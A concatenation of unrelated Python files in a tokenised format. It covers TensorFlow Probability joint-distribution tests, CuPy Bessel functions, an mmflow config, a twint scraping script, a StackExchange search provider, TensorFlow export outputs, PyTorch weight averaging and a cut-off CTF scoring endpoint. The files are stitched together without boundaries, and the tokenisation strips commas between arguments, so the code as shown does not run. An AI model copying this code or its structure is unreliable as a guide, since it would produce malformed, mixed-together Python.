value[3]<times>tf.ones(expect_shp))<line_sep>sample_shape_dynamic=tf1.placeholder_with_default(sample_shape shape=<none>)<line_sep>samples=joint.sample(sample_shape_dynamic value=value seed=test_util.test_seed(sampler_type=sampler_type))<line_sep>xs=self.evaluate(samples)<line_sep>self.assertAllEqual(xs[0] tf.fill(sample_shape+[value_partial_batch_dim] value[0]))<line_sep>self.assertAllEqual(xs[1].shape expect_shp)<line_sep>self.assertAllEqual(xs[2].shape expect_shp)<line_sep>self.assertAllEqual(xs[3] value[3]<times>tf.ones(expect_shp))<block_end>@parameterized.named_parameters(dict(testcase_name='stateful' sampler_type='stateful') dict(testcase_name='stateless' sampler_type='stateless'))<def_stmt>test_sample_with_prefix_of_values self sampler_type<block_start>num_rows=4<line_sep>num_columns=5<def_stmt>dist <block_start>a=<yield>tfd.Sample(tfd.Normal(0. 1.) num_rows name='a')<line_sep>b=<yield>tfd.Sample(tfd.Normal(0. 1.) num_columns name='b')<line_sep><yield>tfd.Normal(a[<ellipsis> <none>]<times>b[<none> <ellipsis>] 1. name='c')<block_end>tuple_joint=tfd.JointDistributionCoroutineAutoBatched(dist validate_args=<true>)<line_sep>namedtuple_joint=tfd.JointDistributionCoroutineAutoBatched(dist sample_dtype=collections.namedtuple('ModelSpec' ['a' 'b' 'c'])(a=tf.float32 b=tf.float32 c=tf.float32) validate_args=<true>)<line_sep>value_partial_batch_dim=3<line_sep>v0=3.<times>np.ones([value_partial_batch_dim num_rows]).astype(np.float32)<line_sep># Tuple (or namedtuple) value contains only the first variable. tuple_value=(v0 )<line_sep>namedtuple_value=collections.namedtuple('ValueSpec' ['a'])(a=v0)<for_stmt>joint (tuple_joint namedtuple_joint)<block_start><for_stmt>value (tuple_value namedtuple_value)<block_start>xs=self.evaluate(joint.sample(value=value seed=test_util.test_seed(sampler_type=sampler_type)))<line_sep>self.assertAllEqual(xs[0] v0)<line_sep>self.assertAllEqual(xs[1].shape [value_partial_batch_dim num_columns])<line_sep>self.assertAllEqual(xs[2].shape [value_partial_batch_dim num_rows num_columns])<block_end><block_end><block_end><def_stmt>test_unit_sample_shape_avoids_vectorization self<block_start>xs=[]# Collect (possibly symbolic) Tensors sampled inside the model. @tfd.JointDistributionCoroutineAutoBatched<def_stmt>dist <block_start>x=<yield>tfd.Normal(0. 1. name='x')<line_sep>xs.append(x)<block_end># Try sampling with a variety of unit sample shapes. self.assertEqual([1] dist.sample(1 seed=test_util.test_seed(sampler_type='seedless')).x.shape)<line_sep>self.assertEqual([1] dist.sample([1] seed=test_util.test_seed(sampler_type='seedless')).x.shape)<line_sep>self.assertEqual([1 1] dist.sample([1 1] seed=test_util.test_seed(sampler_type='seedless')).x.shape)<line_sep># Check that the model only ever saw the trivial sample shape. <for_stmt>x xs<block_start>self.assertEqual(x.shape [])<block_end><block_end><def_stmt>test_unit_sample_shape self<block_start>@tfd.JointDistributionCoroutineAutoBatched<def_stmt>dist <block_start>x=<yield>tfd.Normal(loc=tf.zeros([3]) scale=1. name='x')<line_sep><yield>tfd.Bernoulli(logits=tf.einsum('n->' x) name='y')<block_end><for_stmt>sample_shape [() 1 [1] [1 1] [2]]<block_start>self.assertAllEqual(dist.log_prob(dist.sample(sample_shape seed=test_util.test_seed())).shape np.reshape(sample_shape [-1]))<block_end><block_end><def_stmt>test_sample_dtype_structures_output self<block_start>num_features=4<def_stmt>dist <block_start>scale_variance=<yield>Root(tfd.InverseGamma(0.5 0.5))<line_sep>scale_noncentered=<yield>Root(tfd.Sample(tfd.HalfNormal(1.) num_features))<line_sep>scale=scale_noncentered<times>scale_variance[<ellipsis> <none>]<power>0.5<line_sep>weights_noncentered=<yield>Root(tfd.Sample(tfd.Normal(0. 1.) num_features))<line_sep><yield>tfd.Deterministic(weights_noncentered<times>scale)<block_end># Currently sample_dtype is only used for `tf.nest.pack_structure_as`. In # the future we may use it for error checking and/or casting. sample_dtype=collections.namedtuple('Model' ['scale_variance' 'scale_noncentered' 'weights_noncentered' 'weights' ])(*([<none>]<times>4))<line_sep>joint=tfd.JointDistributionCoroutineAutoBatched(dist sample_dtype=sample_dtype validate_args=<true>)<line_sep>self.assertAllEqual(sorted(sample_dtype._fields) sorted(joint.sample(seed=test_util.test_seed())._fields))<line_sep>ds,xs=joint.sample_distributions(seed=test_util.test_seed())<line_sep>tf.nest.assert_same_structure(sample_dtype ds)<line_sep>tf.nest.assert_same_structure(sample_dtype xs)<line_sep>self.assertEqual([3 4] joint.log_prob(joint.sample([3 4] seed=test_util.test_seed())).shape)<block_end><def_stmt>test_repr_with_custom_sample_dtype self<block_start>sd=collections.namedtuple('Model' ['s' 'w'])(<none> <none>)<def_stmt>dist <block_start>s=<yield>tfd.Sample(tfd.InverseGamma(2 2) 100)<line_sep><yield>tfd.Normal(0 s)<block_end>m=tfd.JointDistributionCoroutineAutoBatched(dist sample_dtype=sd)<line_sep>self.assertEqual(('<tfp.distributions.JointDistributionCoroutineAutoBatched'<concat>' \'JointDistributionCoroutineAutoBatched\''<concat>' batch_shape=[]'<concat>' event_shape=Model(s=[100], w=[100])'<concat>' dtype=Model(s=float32, w=float32)>') repr(m))<block_end>@parameterized.named_parameters({'testcase_name':'coroutine' 'jd_class':tfd.JointDistributionCoroutineAutoBatched} {'testcase_name':'sequential' 'jd_class':tfd.JointDistributionSequentialAutoBatched} {'testcase_name':'named' 'jd_class':tfd.JointDistributionNamedAutoBatched})@test_util.jax_disable_variable_test<def_stmt>test_latent_dirichlet_allocation self jd_class# pylint: disable=g-doc-args <block_start>"""Tests Latent Dirichlet Allocation joint model. The LDA generative process can be written as: ```none N[i] ~ Poisson(xi) theta[i] ~ Dirichlet(alpha) Z[i] ~ Multinomial(N[i], theta[i]) for k in 1...K: X[i,k] ~ Multinomial(Z[i, k], beta[j]) ``` Typically `xi` is specified and `alpha`, `beta` are fit using type-II maximum likelihood estimators. Reference: http://www.jmlr.org/papers/volume3/blei03a/blei03a.pdf """<line_sep>seed=test_util.test_seed_stream()<line_sep># Hyperparameters. num_topics=3<line_sep>num_words=10<line_sep>avg_doc_length=5<line_sep>u=tfd.Uniform(low=-1. high=1.)<line_sep>alpha=tfp.util.TransformedVariable(u.sample([num_topics] seed=seed()) tfb.Softplus() name='alpha')<line_sep>beta=tf.Variable(u.sample([num_topics num_words] seed=seed()) name='beta')<line_sep># Note near 1:1 with mathematical specification. The main distinction is the # use of Independent--this lets us easily aggregate multinomials across # topics (and in any "shape" of documents). <def_stmt>lda_coroutine_model <block_start>n=<yield>Root(tfd.Poisson(rate=avg_doc_length))<line_sep>theta=<yield>Root(tfd.Dirichlet(concentration=alpha))<line_sep>z=<yield>tfd.Multinomial(total_count=n probs=theta)<line_sep><yield>tfd.Multinomial(total_count=z logits=beta)<block_end><if_stmt>jd_class<is>tfd.JointDistributionCoroutineAutoBatched<block_start>model=lda_coroutine_model<block_end><elif_stmt>jd_class<is>tfd.JointDistributionSequentialAutoBatched<block_start>model=[tfd.Poisson(rate=avg_doc_length) # n tfd.Dirichlet(concentration=alpha) # theta <lambda>theta n:tfd.Multinomial(total_count=n probs=theta) # z <lambda>z:tfd.Multinomial(total_count=z logits=beta)]<block_end><elif_stmt>jd_class<is>tfd.JointDistributionNamedAutoBatched<block_start>model=collections.OrderedDict((('n' tfd.Poisson(rate=avg_doc_length)) ('theta' tfd.Dirichlet(concentration=alpha)) ('z' <lambda>theta n:tfd.Multinomial(total_count=n probs=theta)) ('X' <lambda>z:tfd.Multinomial(total_count=z logits=beta))))<block_end># TODO(b/159842104): Enable autovectorization for Multinomial sampling. lda=jd_class(model validate_args=<true> use_vectorized_map=<false>)<line_sep># Now, let's sample some "documents" and compute the log-prob of each. docs_shape=[2 4]# That is, 8 docs in the shape of [2, 4]. sample=lda.sample(docs_shape seed=seed())<line_sep>log_probs=lda.log_prob(sample)<line_sep>self.assertEqual(docs_shape log_probs.shape)<line_sep># Verify we correctly track trainable variables. self.assertLen(lda.trainable_variables 2)<line_sep>self.assertIs(alpha.pretransformed_input lda.trainable_variables[0])<line_sep>self.assertIs(beta lda.trainable_variables[1])<line_sep># Ensure we can compute gradients. <with_stmt>tf.GradientTape()<as>tape# Note: The samples are not taped, hence implicitly "stop_gradient." <block_start>negloglik=-lda.log_prob(sample)<block_end>grads=tape.gradient(negloglik lda.trainable_variables)<line_sep>self.assertLen(grads 2)<line_sep>self.assertAllEqual((alpha.pretransformed_input.shape beta.shape) (grads[0].shape grads[1].shape))<line_sep>self.assertAllNotNone(grads)<block_end>@parameterized.named_parameters({'testcase_name':'coroutine' 'jd_class':tfd.JointDistributionCoroutineAutoBatched} {'testcase_name':'sequential' 'jd_class':tfd.JointDistributionSequentialAutoBatched} {'testcase_name':'named' 'jd_class':tfd.JointDistributionNamedAutoBatched})<def_stmt>test_default_event_space_bijector self jd_class<block_start>models={}<def_stmt>coroutine_model <block_start>high=<yield>tfd.LogNormal(0. [1.])<line_sep><yield>tfd.Uniform(low=[[-1. -2.]] high=high[<ellipsis> tf.newaxis])<line_sep><yield>tfd.Deterministic([[0. 1. 2.]])<block_end>models[tfd.JointDistributionCoroutineAutoBatched]=coroutine_model<line_sep>models[tfd.JointDistributionSequentialAutoBatched]=[tfd.LogNormal(0. [1.]) <lambda>high:tfd.Uniform(low=[[-1. -2.]] high=high[<ellipsis> tf.newaxis]) tfd.Deterministic([[0. 1. 2.]])]<line_sep>models[tfd.JointDistributionNamedAutoBatched]=collections.OrderedDict((('high' tfd.LogNormal(0. [1.])) ('x' <lambda>high:tfd.Uniform(low=[[-1. -2.]] # pylint: disable=g-long-lambda high=high[<ellipsis> tf.newaxis])) ('y' tfd.Deterministic([[0. 1. 2.]]))))<line_sep>joint=jd_class(models[jd_class] batch_ndims=1 validate_args=<true>)<line_sep>self.assertAllEqual(joint.batch_shape [1])<line_sep>self.assertAllEqualNested(tf.nest.flatten(joint.event_shape) [[] [2] [3]])<line_sep>joint_bijector=joint.experimental_default_event_space_bijector()<line_sep>y=self.evaluate(joint.sample([2 3] seed=test_util.test_seed()))<line_sep>x=joint_bijector.inverse(y)<line_sep>self.assertAllCloseNested(y joint_bijector.forward(x))<line_sep>fldj=joint_bijector.forward_log_det_jacobian(x event_ndims=tf.nest.pack_sequence_as(joint.dtype [0 1 2]))<line_sep>ildj=joint_bijector.inverse_log_det_jacobian(y event_ndims=tf.nest.pack_sequence_as(joint.dtype [0 1 1]))<line_sep>self.assertAllEqual(fldj.shape joint.log_prob(y).shape)<line_sep>self.assertAllClose(fldj -ildj)<line_sep># Passing inputs *without* batch shape should return sane outputs. y=self.evaluate(joint.sample([] seed=test_util.test_seed()))<line_sep># Strip the sample to represent just a single event. unbatched_y=tf.nest.map_structure(<lambda>t:t[0 <ellipsis>] y)<line_sep>self.assertAllEqualNested(tf.nest.map_structure(tf.shape unbatched_y) joint.event_shape_tensor())<line_sep>ildj=joint_bijector.inverse_log_det_jacobian(unbatched_y event_ndims=tf.nest.pack_sequence_as(joint.dtype [0 1 1]))<line_sep>self.assertAllEqual(ildj.shape joint.log_prob(unbatched_y).shape)<block_end>@parameterized.named_parameters({'testcase_name':'coroutine' 'jd_class':tfd.JointDistributionCoroutineAutoBatched} {'testcase_name':'sequential' 'jd_class':tfd.JointDistributionSequentialAutoBatched} {'testcase_name':'named' 'jd_class':tfd.JointDistributionNamedAutoBatched})<def_stmt>test_default_event_space_bijector_constant_jacobian self jd_class<block_start>models={}<def_stmt>coroutine_model <block_start><yield>tfd.Normal(0. [1. 2.] name='x')<block_end>models[tfd.JointDistributionCoroutineAutoBatched]=coroutine_model<line_sep>models[tfd.JointDistributionSequentialAutoBatched]=[tfd.Normal(0. [1. 2.] name='x')]<line_sep>models[tfd.JointDistributionNamedAutoBatched]={'x':tfd.Normal(0. [1. 2.] name='x')}<line_sep>joint=jd_class(models[jd_class] batch_ndims=1 validate_args=<true>)<line_sep>self.assertAllEqual(joint.batch_shape [2])<line_sep>joint_bijector=joint.experimental_default_event_space_bijector()<line_sep>y=self.evaluate(joint.sample([3] seed=test_util.test_seed()))<line_sep>x=joint_bijector.inverse(y)<line_sep>self.assertAllCloseNested(y joint_bijector.forward(x))<line_sep>fldj=joint_bijector.forward_log_det_jacobian(x)<line_sep>ildj=joint_bijector.inverse_log_det_jacobian(y)<line_sep>self.assertAllEqual(fldj.shape joint.log_prob(y).shape)<line_sep>self.assertAllClose(fldj -ildj)<block_end><def_stmt>test_nested_joint_distributions self<block_start>batch_shape=[2 3]<def_stmt>inner_fn <block_start>xy=<yield>tfd.JointDistributionNamedAutoBatched({'x':tfd.Normal(loc=tf.zeros(batch_shape) scale=tf.ones(batch_shape) name='x') 'y':<lambda>x:tfd.Poisson(log_rate=x name='y')} batch_ndims=2 name='xy')<line_sep>_=<yield>tfd.Normal(loc=0. scale=xy['y'] name='z')<block_end>joint=tfd.JointDistributionSequentialAutoBatched([tfd.JointDistributionCoroutineAutoBatched(inner_fn batch_ndims=1 name='a')])<line_sep>z=joint.sample(seed=test_util.test_seed())<line_sep># Batch and event shape. self.assertAllEqual(joint.batch_shape [])<line_sep>self.assertAllEqualNested(tf.nest.map_structure(<lambda>x:tf.TensorShape(x.shape) z) joint.event_shape)<line_sep># Sample shape. z2=self.evaluate(joint.sample(5 seed=test_util.test_seed()))<line_sep>lp2=joint.log_prob(z2)<line_sep>self.assertAllEqual(lp2.shape [5])<line_sep>z3=joint.sample(value=z2 seed=test_util.test_seed())<line_sep>self.assertAllCloseNested(z2 z3)<block_end>@parameterized.named_parameters(*[dict(testcase_name='_{}{}'.format(jd_class.__name__ # pylint: disable=g-complex-comprehension '_jit'<if>jit<else>'') jd_class=jd_class jit=jit)<for>jd_class (tfd.JointDistributionCoroutineAutoBatched tfd.JointDistributionSequentialAutoBatched tfd.JointDistributionNamedAutoBatched)<for>jit (<false> <true>)])<def_stmt>test_kahan_precision self jd_class jit<block_start>maybe_jit=<lambda>f:f<if_stmt>jit<block_start>self.skip_if_no_xla()<if_stmt><not>JAX_MODE<and><not>tf.test.is_gpu_available()<block_start>self.skipTest('b/179303849')<block_end>maybe_jit=tf.function(jit_compile=<true>)<block_end><def_stmt>make_models dtype<block_start>models={}<def_stmt>mk_20k_poisson log_rate<block_start><return>tfd.Poisson(log_rate=tf.broadcast_to(log_rate[<ellipsis> tf.newaxis] log_rate.shape+(20_000 )))<block_end><def_stmt>coroutine_model <block_start>log_rate=<yield>tfd.Normal(0. dtype(.2) name='log_rate')<line_sep><yield>mk_20k_poisson(log_rate).copy(name='x')<block_end>models[tfd.JointDistributionCoroutineAutoBatched]=coroutine_model<line_sep>models[tfd.JointDistributionSequentialAutoBatched]=[tfd.Normal(0. dtype(.2)) mk_20k_poisson]<line_sep>models[tfd.JointDistributionNamedAutoBatched]=collections.OrderedDict((('log_rate' tfd.Normal(0. dtype(.2))) ('x' mk_20k_poisson)))<line_sep><return>models<block_end>joint=jd_class(make_models(np.float32)[jd_class] validate_args=<true> experimental_use_kahan_sum=<true>)<line_sep>joint64=jd_class(make_models(np.float64)[jd_class] validate_args=<true>)<line_sep>stream=test_util.test_seed_stream()<line_sep>nsamp=7<line_sep>xs=self.evaluate(joint.sample(log_rate=tf.zeros([nsamp]) seed=stream()))<if_stmt>isinstance(xs dict)<block_start>xs['log_rate']=tfd.Normal(0 .2).sample(nsamp seed=stream())<block_end><else_stmt><block_start>xs=(tfd.Normal(0 .2).sample(nsamp seed=stream()) xs[1])<block_end>xs64=tf.nest.map_structure(<lambda>x:tf.cast(x tf.float64) xs)<line_sep>lp=maybe_jit(joint.copy(validate_args=<not>jit).log_prob)(xs)<line_sep>lp64=joint64.log_prob(xs64)<line_sep>lp,lp64=self.evaluate((tf.cast(lp tf.float64) lp64))<line_sep># Without Kahan, example max-abs-diff: ~0.06 self.assertAllClose(lp64 lp rtol=0. atol=.01)<block_end><def_stmt>test_kahan_broadcasting_check self<block_start><def_stmt>model <block_start>_=<yield>tfd.Normal(0. 1.)# Batch shape () _=<yield>tfd.Normal([0. 1. 2.] 1.)# Batch shape [3] <block_end>dist=tfd.JointDistributionCoroutineAutoBatched(model validate_args=<true> experimental_use_kahan_sum=<true> batch_ndims=1)<line_sep>sample=self.evaluate(dist.sample(seed=test_util.test_seed(sampler_type='stateless')))<with_stmt>self.assertRaises(ValueError)<block_start>self.evaluate(dist.log_prob(sample))<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'# TODO(b/173158845): XLA:CPU reassociates away the Kahan correction term. <block_start>os.environ['XLA_FLAGS']='--xla_cpu_enable_fast_math=false'<line_sep>test_util.main()<block_end>
<import_from_stmt>cupy _core<line_sep>j0=_core.create_ufunc('cupyx_scipy_special_j0' ('f->f' 'd->d') 'out0 = j0(in0)' doc='''Bessel function of the first kind of order 0. .. seealso:: :meth:`scipy.special.j0` ''')<line_sep>j1=_core.create_ufunc('cupyx_scipy_special_j1' ('f->f' 'd->d') 'out0 = j1(in0)' doc='''Bessel function of the first kind of order 1. .. seealso:: :meth:`scipy.special.j1` ''')<line_sep>y0=_core.create_ufunc('cupyx_scipy_special_y0' ('f->f' 'd->d') 'out0 = y0(in0)' doc='''Bessel function of the second kind of order 0. .. seealso:: :meth:`scipy.special.y0` ''')<line_sep>y1=_core.create_ufunc('cupyx_scipy_special_y1' ('f->f' 'd->d') 'out0 = y1(in0)' doc='''Bessel function of the second kind of order 1. .. seealso:: :meth:`scipy.special.y1` ''')<line_sep>i0=_core.create_ufunc('cupyx_scipy_special_i0' ('f->f' 'd->d') 'out0 = cyl_bessel_i0(in0)' doc='''Modified Bessel function of order 0. .. seealso:: :meth:`scipy.special.i0` ''')<line_sep>i1=_core.create_ufunc('cupyx_scipy_special_i1' ('f->f' 'd->d') 'out0 = cyl_bessel_i1(in0)' doc='''Modified Bessel function of order 1. .. seealso:: :meth:`scipy.special.i1` ''')<line_sep>
_base_=['../_base_/models/irrpwc.py' '../_base_/datasets/flyingthings3d_subset_bi_with_occ_384x768.py' '../_base_/schedules/schedule_s_fine_half.py' '../_base_/default_runtime.py']<line_sep>custom_hooks=[dict(type='EMAHook')]<line_sep>data=dict(train_dataloader=dict(samples_per_gpu=1 workers_per_gpu=5 drop_last=<true>) val_dataloader=dict(samples_per_gpu=1 workers_per_gpu=5 shuffle=<false>) test_dataloader=dict(samples_per_gpu=1 workers_per_gpu=5 shuffle=<false>))<line_sep># Train on FlyingChairsOcc and finetune on FlyingThings3D_subset load_from='https://download.openmmlab.com/mmflow/irr/irrpwc_8x1_sshort_flyingchairsocc_384x448.pth'# noqa
<import_stmt>sys<import_stmt>base_func<as>base<import_stmt>twint<import_from_stmt>similar_hashtags similar_hashtags<import_from_stmt>top_mentions_hashtags top_mentions_hashtags<as>mentions<def_stmt>basic username search<block_start>base.get_user_bio(username search)<line_sep>base.get_user_tweets(username search <true>)<block_end><def_stmt>get_keyword key limit=100<block_start>base.get_tweets(key limit)<block_end><def_stmt>top_mention <block_start>key_val=int(input('no of users'))<line_sep>seed_user=list(map(str input('Enter usernames').strip().split()))[:key_val]<line_sep>limit=int(input('No of tweets to be pulled'))# default limit = 500 <for_stmt>username seed_user<block_start>mentions.get_top_mentions_hashtags(username)<block_end><block_end><def_stmt>similar_hashtag <block_start>key_val=int(input('no of hastags'))<line_sep>seed_hash=list(map(str input('Enter hashtags').strip().split()))[:key_val]<line_sep>limit=int(input('No of tweets to be pulled'))# default limit = 500 <for_stmt>seed_hashtag seed_hash<block_start>similar_hashtags.get_similar_hashtags(seed_hashtag limit)<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>username=sys.argv[1]<line_sep>string=sys.argv[2]<line_sep>basic(username string)<block_end>
module_name="Search"<line_sep>priority=17<line_sep>
# # Copyright (C) 2020 IBM. All Rights Reserved. # # See LICENSE.txt file in the root directory # of this source tree for licensing information. # <import_stmt>json<import_from_stmt>typing List Dict<import_from_stmt>clai.server.searchlib.providers Provider<class_stmt>StackExchange(Provider)<block_start><def_stmt>__init__ self name:str description:str section:dict<block_start>super().__init__(name description section)<line_sep>self.__log_debug__("UNIX StackExchange provider initialized")<block_end><def_stmt>call self query:str limit:int=1 **kwargs<block_start>self.__log_debug__(f"call(query={query}, limit={str(limit)}), **kwargs={str(kwargs)})")<line_sep>payload={"text":query "limit":limit}<line_sep>request=self.__send_post_request__(self.base_uri data=json.dumps(payload))<if_stmt>request.status_code<eq>200<block_start><return>request.json()["hits"]<block_end><return><none><block_end><def_stmt>extract_search_result self data:List[Dict]<arrow>str<block_start><return>data[0]["Answer"]<block_end><def_stmt>get_printable_output self data:List[Dict]<arrow>str<block_start>lines=[f"Post: {data[0]['Content'][:384]+' ...'}" f"Answer: {data[0]['Answer'][:256]+' ...'}" f"Link: {data[0]['Url']}\n" ]<line_sep><return>"\n".join(lines)<block_end><block_end>
# Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Classes for different types of export output."""<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_stmt>abc<import_stmt>six<import_from_stmt>tensorflow.python.framework dtypes<import_from_stmt>tensorflow.python.framework ops<import_from_stmt>tensorflow.python.saved_model signature_def_utils<class_stmt>ExportOutput(object)<block_start>"""Represents an output of a model that can be served. These typically correspond to model heads. """<line_sep>__metaclass__=abc.ABCMeta<line_sep>@abc.abstractmethod<def_stmt>as_signature_def self receiver_tensors<block_start>"""Generate a SignatureDef proto for inclusion in a MetaGraphDef. The SignatureDef will specify outputs as described in this ExportOutput, and will use the provided receiver_tensors as inputs. Args: receiver_tensors: a `Tensor`, or a dict of string to `Tensor`, specifying input nodes that will be fed. """<line_sep><pass><block_end><block_end><class_stmt>ClassificationOutput(ExportOutput)<block_start>"""Represents the output of a classification head. Either classes or scores or both must be set. The classes `Tensor` must provide string labels, not integer class IDs. If only classes is set, it is interpreted as providing top-k results in descending order. If only scores is set, it is interpreted as providing a score for every class in order of class ID. If both classes and scores are set, they are interpreted as zipped, so each score corresponds to the class at the same index. Clients should not depend on the order of the entries. """<def_stmt>__init__ self scores=<none> classes=<none><block_start>"""Constructor for `ClassificationOutput`. Args: scores: A float `Tensor` giving scores (sometimes but not always interpretable as probabilities) for each class. May be `None`, but only if `classes` is set. Interpretation varies-- see class doc. classes: A string `Tensor` giving predicted class labels. May be `None`, but only if `scores` is set. Interpretation varies-- see class doc. Raises: ValueError: if neither classes nor scores is set, or one of them is not a `Tensor` with the correct dtype. """<if_stmt>(scores<is><not><none><and><not>(isinstance(scores ops.Tensor)<and>scores.dtype.is_floating))<block_start><raise>ValueError('Classification scores must be a float32 Tensor; '<concat>'got {}'.format(scores))<block_end><if_stmt>(classes<is><not><none><and><not>(isinstance(classes ops.Tensor)<and>dtypes.as_dtype(classes.dtype)<eq>dtypes.string))<block_start><raise>ValueError('Classification classes must be a string Tensor; '<concat>'got {}'.format(classes))<block_end><if_stmt>scores<is><none><and>classes<is><none><block_start><raise>ValueError('At least one of scores and classes must be set.')<block_end>self._scores=scores<line_sep>self._classes=classes<block_end>@property<def_stmt>scores self<block_start><return>self._scores<block_end>@property<def_stmt>classes self<block_start><return>self._classes<block_end><def_stmt>as_signature_def self receiver_tensors<block_start><if_stmt>len(receiver_tensors)<ne>1<block_start><raise>ValueError('Classification input must be a single string Tensor; '<concat>'got {}'.format(receiver_tensors))<block_end>(_ examples),=receiver_tensors.items()<if_stmt>dtypes.as_dtype(examples.dtype)<ne>dtypes.string<block_start><raise>ValueError('Classification input must be a single string Tensor; '<concat>'got {}'.format(receiver_tensors))<block_end><return>signature_def_utils.classification_signature_def(examples self.classes self.scores)<block_end><block_end><class_stmt>RegressionOutput(ExportOutput)<block_start>"""Represents the output of a regression head."""<def_stmt>__init__ self value<block_start>"""Constructor for `RegressionOutput`. Args: value: a float `Tensor` giving the predicted values. Required. Raises: ValueError: if the value is not a `Tensor` with dtype tf.float32. """<if_stmt><not>(isinstance(value ops.Tensor)<and>value.dtype.is_floating)<block_start><raise>ValueError('Regression output value must be a float32 Tensor; '<concat>'got {}'.format(value))<block_end>self._value=value<block_end>@property<def_stmt>value self<block_start><return>self._value<block_end><def_stmt>as_signature_def self receiver_tensors<block_start><if_stmt>len(receiver_tensors)<ne>1<block_start><raise>ValueError('Regression input must be a single string Tensor; '<concat>'got {}'.format(receiver_tensors))<block_end>(_ examples),=receiver_tensors.items()<if_stmt>dtypes.as_dtype(examples.dtype)<ne>dtypes.string<block_start><raise>ValueError('Regression input must be a single string Tensor; '<concat>'got {}'.format(receiver_tensors))<block_end><return>signature_def_utils.regression_signature_def(examples self.value)<block_end><block_end><class_stmt>PredictOutput(ExportOutput)<block_start>"""Represents the output of a generic prediction head. A generic prediction need not be either a classification or a regression. Named outputs must be provided as a dict from string to `Tensor`, """<def_stmt>__init__ self outputs<block_start>"""Constructor for PredictOutput. Args: outputs: A dict of string to `Tensor` representing the predictions. Raises: ValueError: if the outputs is not dict, or any of its keys are not strings, or any of its values are not `Tensor`s. """<if_stmt><not>isinstance(outputs dict)<block_start><raise>ValueError('Prediction outputs must be given as a dict of string to Tensor; '<concat>'got {}'.format(outputs))<block_end><for_stmt>key,value outputs.items()<block_start><if_stmt><not>isinstance(key six.string_types)<block_start><raise>ValueError('Prediction output key must be a string; got {}.'.format(key))<block_end><if_stmt><not>isinstance(value ops.Tensor)<block_start><raise>ValueError('Prediction output value must be a Tensor; got {}.'.format(value))<block_end><block_end>self._outputs=outputs<block_end>@property<def_stmt>outputs self<block_start><return>self._outputs<block_end><def_stmt>as_signature_def self receiver_tensors<block_start><return>signature_def_utils.predict_signature_def(receiver_tensors self.outputs)<block_end><block_end>
<import_from_stmt>typing List Union<import_from_stmt>collections OrderedDict<import_stmt>glob<import_stmt>os<import_from_stmt>pathlib Path<import_stmt>torch<def_stmt>_load_weights path:str<arrow>dict<block_start>""" Load weights of a model. Args: path: Path to model weights Returns: Weights """<line_sep>weights=torch.load(path map_location=<lambda>storage loc:storage)<if_stmt>"model_state_dict"<in>weights<block_start>weights=weights["model_state_dict"]<block_end><return>weights<block_end><def_stmt>average_weights state_dicts:List[dict]<arrow>OrderedDict<block_start>""" Averaging of input weights. Args: state_dicts: Weights to average Raises: KeyError: If states do not match Returns: Averaged weights """<line_sep># source https://gist.github.com/qubvel/70c3d5e4cddcde731408f478e12ef87b params_keys=<none><for_stmt>i,state_dict enumerate(state_dicts)<block_start>model_params_keys=list(state_dict.keys())<if_stmt>params_keys<is><none><block_start>params_keys=model_params_keys<block_end><elif_stmt>params_keys<ne>model_params_keys<block_start><raise>KeyError("For checkpoint {}, expected list of params: {}, "<concat>"but found: {}".format(i params_keys model_params_keys))<block_end><block_end>average_dict=OrderedDict()<for_stmt>k state_dicts[0].keys()<block_start>average_dict[k]=torch.div(sum(state_dict[k]<for>state_dict state_dicts) len(state_dicts))<block_end><return>average_dict<block_end><def_stmt>get_averaged_weights_by_path_mask path_mask:str logdir:Union[str Path]=<none><arrow>OrderedDict<block_start>""" Averaging of input weights and saving them. Args: path_mask: globe-like pattern for models to average logdir: Path to logs directory Returns: Averaged weights """<if_stmt>logdir<is><none><block_start>models_pathes=glob.glob(path_mask)<block_end><else_stmt><block_start>models_pathes=glob.glob(os.path.join(logdir "checkpoints" path_mask))<block_end>all_weights=[_load_weights(path)<for>path models_pathes]<line_sep>averaged_dict=average_weights(all_weights)<line_sep><return>averaged_dict<block_end>__all__=["average_weights" "get_averaged_weights_by_path_mask"]<line_sep>
# Scores old stuff # # Helper functions # # FIXME: use ticks instead, teams are either up for the whole tick or down for the whole tick <def_stmt>_get_uptime_for_team team_id cursor<block_start>"""Calculate the uptime for a team. The uptime is normalized to 0 to 100. An uptime of 100 means the team was online for the entire tick, while an uptime of 0 means it was not online at all. :param int team_id: ID of the team. :param cursor: Cursor that points to the MySQL database. :return: Uptime of the team, between [0, 100] """<line_sep># FIXME: This currently does not work for disabled and enabled services. # We should calculate the uptime per tick. # Fetch total number of total tests made cursor.execute("""SELECT COUNT(id) AS count, service_id FROM team_service_state WHERE team_id = %s GROUP BY service_id""" (team_id ))<line_sep>total_counts=dict()<for_stmt>result cursor.fetchall()<block_start>total_counts[result["service_id"]]=result["count"]<block_end># Fetch number of tests that were successful (up and working) cursor.execute("""SELECT COUNT(id) AS count, service_id FROM team_service_state WHERE team_id = %s AND state = 'up' GROUP BY service_id""" (team_id ))<line_sep>up_counts={}<for_stmt>result cursor.fetchall()<block_start>up_counts[result["service_id"]]=result["count"]<block_end># Calculate the average uptime services=len(total_counts.keys())<line_sep>avg_uptime=0<for_stmt>service_id,total total_counts.items()<block_start>up_=up_counts[service_id]<line_sep>uptime=(up_<times>1.)/(total<times>1.)<line_sep>avg_uptime<augadd>uptime/services<block_end><return>avg_uptime<times>100<block_end>@app.route("/scores_deprecated")@requires_auth<def_stmt>scores_deprecated <block_start>"""The ``/scores`` endpoint requires authentication and expects no additional argument. It is used to retrieve the current scores for each team. It can be reached at ``/scores?secret=<API_SECRET>``. The JSON response is:: { "scores": {team_id: {score: int, sla: int (0-100, percentage), raw_score: int }} } :return: a JSON dictionary containing status information on the flag. """<line_sep>cursor=mysql.cursor()<line_sep>cursor.execute("""SELECT team_id, name as team_name, SUM(score) AS score FROM team_score JOIN teams ON teams.id = team_score.team_id GROUP BY team_id""")<line_sep>scores_={}<line_sep># Currently, we are multiplying overall score with overall SLA. Do we # actually want to do this, or do we want do calculate this per tick? <for_stmt>result 